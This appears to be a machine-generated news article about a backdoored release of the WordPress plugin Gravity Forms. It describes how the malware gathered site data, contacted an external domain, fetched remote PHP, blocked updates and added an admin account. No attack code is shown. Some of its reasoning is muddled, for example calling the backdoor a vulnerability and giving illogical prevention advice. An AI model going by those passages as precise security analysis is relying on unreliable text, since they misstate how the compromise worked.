WordPress Gravity Forms Deviled by Sophisticated Supply Chain Attack: A Deeper Dive into the Exploitation
A highly sophisticated supply chain attack has compromised the WordPress plugin Gravity Forms, allowing hackers to gain unauthorized access to millions of websites worldwide. The vulnerability was discovered by WordPress security firm PatchStack and highlights the ever-evolving nature of cyber threats. To stay safe, users are advised to update Gravity Forms to the latest version available and check for signs of infection using recommended methods.
The WordPress plugin Gravity Forms has been compromised in a highly sophisticated supply chain attack.
A vulnerability was discovered by WordPress security firm PatchStack, which allowed hackers to collect site metadata and send a malicious POST request.
The vulnerability was specific to Gravity Forms version 2.9.11.1 and 2.9.12 and was caused by an infected common.php file.
RocketGenius has confirmed that the attack blocked update attempts, contacted external servers, and added an admin account giving attackers control of the website.
Users are advised to update Gravity Forms to the latest version and check for signs of infection using recommended methods.
The attack highlights the importance of ongoing security monitoring, regular vulnerability assessments, and prioritizing security in software development.
In a shocking turn of events, the WordPress plugin Gravity Forms has been compromised in a highly sophisticated supply chain attack. This latest development highlights the ever-evolving nature of cyber threats and the importance of maintaining robust security measures to protect against such attacks.
According to reports, the vulnerability was discovered by WordPress security firm PatchStack, which had received a suspicious request generated by plugins downloaded from the official Gravity Forms website. Upon further investigation, it became apparent that the malicious file (gravityforms/common.php) contained a backdoor that allowed hackers to collect extensive site metadata, including URL, admin path, theme, plugins, and PHP/WordPress versions.
The hackers then used this information to send a POST request to a suspicious domain at “gravityapi.org/sites,” which resulted in the server response containing base64-encoded PHP malware. This malware masqueraded as WordPress Content Management Tools and enabled remote code execution without the need for authentication using functions like ‘handle_posts(),’ ‘handle_media(),’ ‘handle_widgets().’
The vulnerability was found to be specific to Gravity Forms version 2.9.11.1 and 2.9.12, which were available for manual download between July 10 and 11. Admins who ran a composer install for these versions received an infected copy of the product.
RocketGenius, the developer behind Gravity Forms, has confirmed that the malicious code blocked update attempts, contacted external servers to fetch additional payloads, and added an admin account that gave the attacker complete control of the website. The company has also provided methods for administrators to check for possible infection by following specific links on their websites.
This attack serves as a stark reminder of the importance of keeping software up-to-date and using secure installation practices. It is also a testament to the ingenuity of attackers, who have managed to exploit vulnerabilities in plugins used by millions of websites worldwide.
The incident highlights the need for robust security measures to be implemented across all aspects of software development, including supply chain security. As the saying goes, "an ounce of prevention is worth a pound of cure," and in this case, the ounce of prevention would have been to update Gravity Forms to the latest version before installation.
In light of this incident, WordPress users are advised to take immediate action to secure their websites. This includes updating Gravity Forms to the latest version available and checking for any signs of infection using the recommended methods provided by RocketGenius.
Furthermore, this attack underscores the importance of ongoing security monitoring and regular vulnerability assessments. By staying vigilant and proactive, organizations can minimize the risk of similar attacks occurring in the future.
The supply chain attack against Gravity Forms also sheds light on the vulnerabilities present in plugins used by millions of websites worldwide. This incident serves as a wake-up call for developers to prioritize security when creating software, and for users to remain cautious when installing new plugins.
In conclusion, this sophisticated supply chain attack highlights the ever-present threat of cyber attacks and the need for robust security measures to be implemented across all aspects of software development. By staying informed and taking proactive steps to secure our websites, we can minimize the risk of similar incidents occurring in the future.
Related Information:
Published: Fri Jul 11 15:32:52 2025 by llama3.2 3B Q4_K_M